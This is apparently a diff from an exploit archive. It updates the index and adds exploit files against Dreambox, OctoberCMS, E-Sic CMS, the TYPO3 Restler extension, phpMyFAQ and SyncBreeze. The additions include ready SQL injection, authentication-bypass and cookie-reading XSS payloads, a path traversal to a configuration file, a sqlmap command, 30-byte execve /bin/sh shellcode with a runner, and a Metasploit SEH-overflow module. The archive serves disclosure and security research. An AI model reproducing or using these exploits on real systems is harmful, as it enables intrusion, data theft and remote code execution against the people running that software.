 37305,platforms/php/webapps/37305.txt,"Plogger Photo Gallery - SQL Injection",2012-05-22,"Eyup CELIK",php,webapps,0
@ -38263,7 +38265,7 @@ id,file,description,date,author,platform,type,port
 41930,platforms/php/webapps/41930.txt,"Joomla! Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
 41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80
 41939,platforms/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps,0
-41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
+41940,platforms/php/webapps/41940.py,"TYPO3 Extension News - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
 41943,platforms/php/webapps/41943.py,"Simple File Uploader - Arbitrary File Download",2017-04-27,"Daniel Godoy",php,webapps,0
 41944,platforms/php/webapps/41944.txt,"Easy File Uploader - Arbitrary File Upload",2017-04-27,"Daniel Godoy",php,webapps,0
 41946,platforms/multiple/webapps/41946.txt,"Emby MediaServer 3.2.5 - SQL Injection",2017-04-30,LiquidWorm,multiple,webapps,0
@ -38672,3 +38674,12 @@ id,file,description,date,author,platform,type,port
 42968,platforms/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,php,webapps,0
 42971,platforms/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
 42972,platforms/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
 42978,platforms/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",php,webapps,0
 42979,platforms/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' Parameter SQL Injection",2017-10-12,"Guilherme Assmann",php,webapps,0
 42980,platforms/php/webapps/42980.txt,"E-Sic Software livre CMS - Autentication Bypass",2017-10-12,"Elber Tavares",php,webapps,0
 42981,platforms/php/webapps/42981.txt,"E-Sic Software livre CMS - 'cpfcnpj' Parameter SQL Injection",2017-10-12,"Elber Tavares",php,webapps,0
 42982,platforms/php/webapps/42982.txt,"E-Sic Software livre CMS - 'f' Parameter SQL Injection",2017-10-12,"Elber Tavares",php,webapps,0
 42983,platforms/php/webapps/42983.txt,"E-Sic Software livre CMS - Cross Site Scripting",2017-10-12,"Elber Tavares",php,webapps,0
 42985,platforms/php/webapps/42985.txt,"TYPO3 Extension Restler 1.7.0 - Local File Disclosure",2017-10-13,CrashBandicot,php,webapps,0
 42986,platforms/hardware/webapps/42986.txt,"Dreambox Plugin BouquetEditor - Cross-Site Scripting",2017-10-12,"Thiago Sena",hardware,webapps,0
 42987,platforms/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting",2017-10-13,"Ishaq Mohammed",php,webapps,0
--- a/platforms/hardware/webapps/42986.txt
+++ b/platforms/hardware/webapps/42986.txt
@ -0,0 +1,25 @@
 # Exploit Title: Vulnerability XSS - Dreambox
 # Shodan Dork: Dreambox 200 
 # Date: 12/10/2017
 # Exploit Author: Thiago "THX" Sena
 # Vendor Homepage: https://www.dreamboxupdate.com
 # Version: 2.0.0
 # Tested on: kali linux, windows 7, 8.1, 10
 # CVE : CVE-2017-15287
 Vulnerabilty: Cross-site scripting (XSS) in plugin BouquetEditor
 ---------------------------------------------------------------
 PoC: 
 - First you go to ( http://IP:PORT/bouqueteditor/ )
 - Then you go to the Bouquets tab, add a new bouquet
 - Then put the script (<script>alert(1)</script>)
 - Xss Vulnerability
--- a/platforms/lin_x86/shellcode/42977.c
+++ b/platforms/lin_x86/shellcode/42977.c
@ -0,0 +1,53 @@
 /*
 Title: Linux/x86 - Polymorphic execve /bin/sh x86 shellcode - 30 bytes
 Author: Manuel Mancera (@sinkmanu)
 Tested on: Linux 3.16.0-4-586 #1 Debian 3.16.43-2+deb8u2 (2017-06-26)
 i686 GNU/Linux
 ----------------- Assembly code -------------------
 global _start           
 section .text
 _start:
    xor eax, eax
    push eax
    mov edi, 0x978cd092
    mov ebx, edi
    neg edi
    push edi
    sub ebx, 0x2e2aa163
    push ebx
    mov ebx, esp
    push eax
    push ebx
    mov ecx, esp
    mov al, 11
    int 0x80
 ---------------------------------------------------
 $ nasm -f elf32 poly-execve.nasm -o poly-execve.o
 $ ld poly-execve.o -o poly-execve
 $ objdump -d ./poly-execve|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/
 /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
 "\x31\xc0\x50\xbf\x92\xd0\x8c\x97\x89\xfb\xf7\xdf\x57\x81\xeb\x63\xa1\x2a\x2e\x53\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
 $ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
 $ ./shellcode
 Length: 30 bytes
 $
 */
 #include <stdio.h>
 #include <string.h>
 const char code[] =  \
 "\x31\xc0\x50\xbf\x92\xd0\x8c\x97\x89\xfb\xf7\xdf\x57\x81\xeb\x63\xa1\x2a\x2e\x53\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
 int main()
 {
    printf("Length: %d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
 }
--- a/platforms/php/webapps/2554.php
+++ b/platforms/php/webapps/2554.php
@ -44,7 +44,7 @@ fclose($f);
 passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
 }
 ?>
-&lt;/textarea&gt;
+</textarea>
 <br>
 Powered By  Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir
 </center>
--- a/platforms/php/webapps/42978.txt
+++ b/platforms/php/webapps/42978.txt
@ -0,0 +1,44 @@
 # Exploit Title: OctoberCMS 1.0.425 (aka Build 425) Stored XSS
 # Vendor Homepage: https://octobercms.com/
 # Software Link: https://octobercms.com/download
 # Exploit Author: Ishaq Mohammed ( https://www.exploit-db.com/author/?a=9086
 )
 # Contact: https://twitter.com/security_prince
 # Website: https://about.me/security-prince
 # Category: webapps
 # CVE: CVE-2017-15284
 1. Description
 Cross-Site Scripting exists in OctoberCMS 1.0.425 (aka Build 425), allowing
 a least privileged user to upload an SVG file containing malicious code as
 the Avatar for the profile. When this is opened by the Admin, it causes
 JavaScript execution in the context of the Admin account.
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15284
 2. Proof of Concept
 Steps to Reproduce:
   - Login using a normal user and click on my account.
   - Click on the avatar.
   - Upload the malicious .svg file which contains the javascript
   - Click on save.
   - Login in another browser with Admin Credentials.
   - Click on Settings > Administrators.
   - Select the normal user's avatar and click on Attachment URL.
 3. Reference
 https://github.com/octobercms/library/commit/3bbbbf3da469f457881b5af902eb0b89b95189a2
 4. Solution
 The vulnerability will be patched by the vendor in the next release of
 OctoberCMS.
 -- 
 Best Regards,
 Ishaq Mohammed
 https://about.me/security-prince
--- a/platforms/php/webapps/42979.txt
+++ b/platforms/php/webapps/42979.txt
@ -0,0 +1,19 @@
 # Exploit Title: E-Sic Software livre CMS - Blind SQL Injection
 # Date: 12/10/2017
 # Exploit Author: Guilherme Assmann
 # Vendor Homepage: https://softwarepublico.gov.br/
 # Version: 1.0
 # Tested on: kali linux, windows 7, 8.1, 10 - Firefox
 # Download https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
 More informations: https://k33r0k.wordpress.com/2017/10/12/e-sic-sql-injection/#more-398
 The vulnerability is in the search private area of e-sic without authentication
 ---------------------------------------------------------------------
 Poc:
  Url: http://vulnerable/esiclivre/restrito/inc/lkpcep.php?q=1
  Parameter: q (GET)
  Payload: 1' AND (SELECT * FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(HEX(IFNULL(CAST(schema_name AS CHAR),0x20))) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 13,1),11,1))>1,0,5)))))oslN)-- UACx
  sqlmap -v 5 -u "http://localhost/esiclivre/restrito/inc/lkpcep.php?q=1" --level 5 --random-agent --hex --dbs
--- a/platforms/php/webapps/42980.txt
+++ b/platforms/php/webapps/42980.txt
@ -0,0 +1,16 @@
 # Exploit Title: E-Sic Software livre CMS - Autentication Bypass#
 Date: 12/10/2017# Exploit Author: Elber Tavares# Vendor Homepage:
 https://softwarepublico.gov.br/# Version: 1.0# Tested on: kali linux,
 windows 7, 8.1, 10 - Firefox# Download
 https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
 More informations:
 http://whiteboyz.xyz/esic-software-publico-autentication-bypass.html
 The vulnerability is in the login area of e-sic,
 where we can enter the panel only using some parameters such as
 username and password
 ---------------------------------------------------------------------
 PoC:
 Url: http://vulnsite/esic/index/ User: '=''or' Pass: '=''or'
 POST: http://vulnsite/esic/index/index.php
 DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar
--- a/platforms/php/webapps/42981.txt
+++ b/platforms/php/webapps/42981.txt
@ -0,0 +1,25 @@
 # Exploit Title: E-Sic Software livre CMS - Sql Injection# Date:
 12/10/2017# Exploit Author: Elber Tavares
 # fireshellsecurity.team/
 # Vendor Homepage: https://softwarepublico.gov.br/# Version: 1.0#
 Tested on: kali linux, windows 7, 8.1, 10 - Firefox# Download
 https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
 More informations:
 http://whiteboyz.xyz/esic-software-publico-sql-injection.html
 vulnerability is in the password reset parameter of the software,
 where we can send sql parameters and interact directly with the
 database. "Informe seu CPF ou CNPJ para enviarmos nova senha:"
 ---------------------------------------------------------------------
 Url: http://vulnerablesite/esic/reset/
 POST: cpfcnpj=test&btsub=Enviar
 Parameter: cpfcnpj (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT
    ('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL--
 GJkR&btsub=Enviar
--- a/platforms/php/webapps/42982.txt
+++ b/platforms/php/webapps/42982.txt
@ -0,0 +1,36 @@
 # Exploit Title: E-Sic Software livre CMS - Sql Injection
 # Date: 12/10/2017
 # Exploit Author: Elber Tavares
 # fireshellsecurity.team/
 # Vendor Homepage: https://softwarepublico.gov.br/
 # Version: 1.0
 # Tested on: kali linux, windows 7, 8.1, 10 - Firefox
 # Download
 https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
 More informations:
 http://whiteboyz.xyz/esic-software-publico-sql-injection.html
 Vulnerability is in the zip code search script
 ---------------------------------------------------------------------
 Url: http://localhost/esiclivre/restrito/inc/buscacep.php
 DATA:
 Parameter: f (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: f=-1932' OR 5987=5987 AND 'dtev'='dtev
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: f=test' OR SLEEP(5) AND 'kucr'='kucr
    Type: UNION query
    Title: MySQL UNION query (random number) - 6 columns
    Payload: f=test' UNION ALL SELECT 3344,3344,
 CONCAT(0x7162627a71,0x54657946565941494562654c437570647a4f4e53616744546e526663454152424e71506e564d6853,0x71786a6a71),
    3344,3344,3344#
--- a/platforms/php/webapps/42983.txt
+++ b/platforms/php/webapps/42983.txt
@ -0,0 +1,23 @@
 # Exploit Title: E-Sic Software livre CMS - Cross Site Scripting#
 Date: 12/10/2017# Exploit Author: Elber Tavares
 # fireshellsecurity.team/
 # Vendor Homepage: https://softwarepublico.gov.br/# Version: 1.0#
 Tested on: kali linux, windows 7, 8.1, 10 - Firefox# Download
 https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
 More informations:
 http://whiteboyz.xyz/esic-software-publico-xss.html
 O XSS está presente na área de cadastro de solicitante,
 onde é possivel injetar códigos pelo input que recebe o nome do usuário
 ---------------------------------------------------------------------
 Url: http://localhost/esic/index/
 POST: http://localhost/cadastro/index.php
 DATA:
 DATA: tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&
 cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=&
 idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com&
 confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=&
 uf=&numero=&complemento=&acao=Salvar
--- a/platforms/php/webapps/42985.txt
+++ b/platforms/php/webapps/42985.txt
@ -0,0 +1,28 @@
 # Exploit Title: Typo3 Restler Extension - Local File Disclosure
 # Date: 2017-10-13
 # Exploit Author: CrashBandicot @dosperl
 # Vendor Homepage: https://www.aoe.com/
 # Software Link: https://extensions.typo3.org/extension/restler/
 # Tested on : MsWin
 # Version: 1.7.0 (last)
 # Vulnerability File : getsource.php
 3.      $file = $_GET['file'];
 13.        $text = file_get_contents($file);
 16.      die($file . '<pre id="php">' . htmlspecialchars($text) . "</pre>");
 # PoC : 
 # http://vuln.site/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
 # https://i.imgur.com/zObmaDD.png
 # Timeline :
 # Vulnerability identified
 # Vendor notified
 # CVE number requested
 # Exploit released
--- a/platforms/php/webapps/42987.txt
+++ b/platforms/php/webapps/42987.txt
@ -0,0 +1,34 @@
 # Exploit Title: phpMyFAQ 2.9.8 Stored XSS
 # Vendor Homepage: http://www.phpmyfaq.de/
 # Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
 # Exploit Author: Ishaq Mohammed
 # Contact: https://twitter.com/security_prince
 # Website: https://about.me/security-prince
 # Category: webapps
 # CVE: CVE-2017-14619
 1. Description
 Cross-site scripting (XSS) vulnerability in phpMyFAQ through 2.9.8 allows
 remote attackers to inject arbitrary web script or HTML via the "Title of
 your FAQ" field in the Configuration Module.
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14619
 2. Proof of Concept
 Steps to Reproduce:
   1. Open the affected link http://localhost/phpmyfaq/admin/?action=config
   with logged in user with administrator privileges
   2. Enter the <marquee onscroll=alert(document.cookie)> in the “Title of
   your FAQ field”
   3. Save the Configuration
   4. Login using any other user or simply click on the phpMyFAQ on the
   top-right hand side of the web portal
 3. Solution:
 The Vulnerability will be fixed in the next release of phpMyFAQ
--- a/platforms/windows/remote/42984.rb
+++ b/platforms/windows/remote/42984.rb
@ -0,0 +1,95 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SyncBreeze v10.1.16 SEH GET Overflow',
      'Description'    => %q{
          There exists an unauthenticated SEH based vulnerability in the HTTP
        server of Sync Breeze Enterprise v10.1.16, when sending a GET request
        with an excessive length it is possible for a malicious user to overwrite the
        SEH record and execute a payload that would run under the Windows NT AUTHORITY\SYSTEM account.
        The SEH record is overwritten with a "POP,POP,RET" pointer from the application
        library libspp.dll. This exploit has been successfully tested on Windows XP, 7 and
        10 (x86->x64). It should work against all versions of Windows and service packs.
      },
      'Author'         => 'wetw0rk',
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'       => 800,
          'EncoderType' => "alpha_upper",
          'BadChars'    => "\x00\x0a\x0d"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP/7/10 (SyncBreez Enterprise v10.1.16)',
            { 'Ret'    => 0x1001C65C,
              'Offset' => 2495 
            }]
        ],
      'DisclosureDate' => 'October 11 2017',
      'DefaultTarget'  => 0))
    register_options([Opt::RPORT(80)])
  end
  def exploit
    connect
    print_status("Trying #{target.name}")
    # Make the JMP to the payload, else JMP into the A's acting as NOP's
    # Using AlphaNum technique learned from Mut's in OSCE (aka a legend)
    jumpcode = "\x25\x4a\x4d\x4e\x55"	# and    eax,0x554e4d4a
    jumpcode << "\x25\x35\x32\x31\x2a"	# and    eax,0x2a313235
    jumpcode << "\x2d\x37\x37\x37\x37"	# sub    eax,0x37373737
    jumpcode << "\x2d\x74\x74\x74\x74"	# sub    eax,0x74747474
    jumpcode << "\x2d\x55\x54\x55\x70"	# sub    eax,0x70555455
    jumpcode << "\x50"			# push   eax
    jumpcode << "\x25\x4a\x4d\x4e\x55"	# and    eax,0x554e4d4a
    jumpcode << "\x25\x35\x32\x31\x2a"	# and    eax,0x2a313235
    jumpcode << "\x2d\x2d\x76\x7a\x63"	# sub    eax,0x637a762d
    jumpcode << "\x2d\x2d\x76\x7a\x30"	# sub    eax,0x307a762d
    jumpcode << "\x2d\x25\x50\x7a\x30"	# sub    eax,0x307a5025
    jumpcode << "\x50"			# push   eax
    jumpcode << "\xff\xe4"		# jmp    esp
    # greetz to kluo, and abatchy17
    sploit = payload.encoded
    sploit << 'A' * (target['Offset'] - payload.encoded.length)
    sploit << "\x74\x06\x75\x06"
    sploit << [target.ret].pack('V')
    sploit << jumpcode
    sploit << 'A' * (9067 - (target['Offset'] + payload.encoded.length + 8 + jumpcode.length))
    send_request_cgi(
      'uri'        =>  '/' + sploit,
      'method'     =>  'GET',
      'host'       =>  '4.2.2.2',
      'connection' =>  'keep-alive'
    )
    handler
    disconnect
  end
 end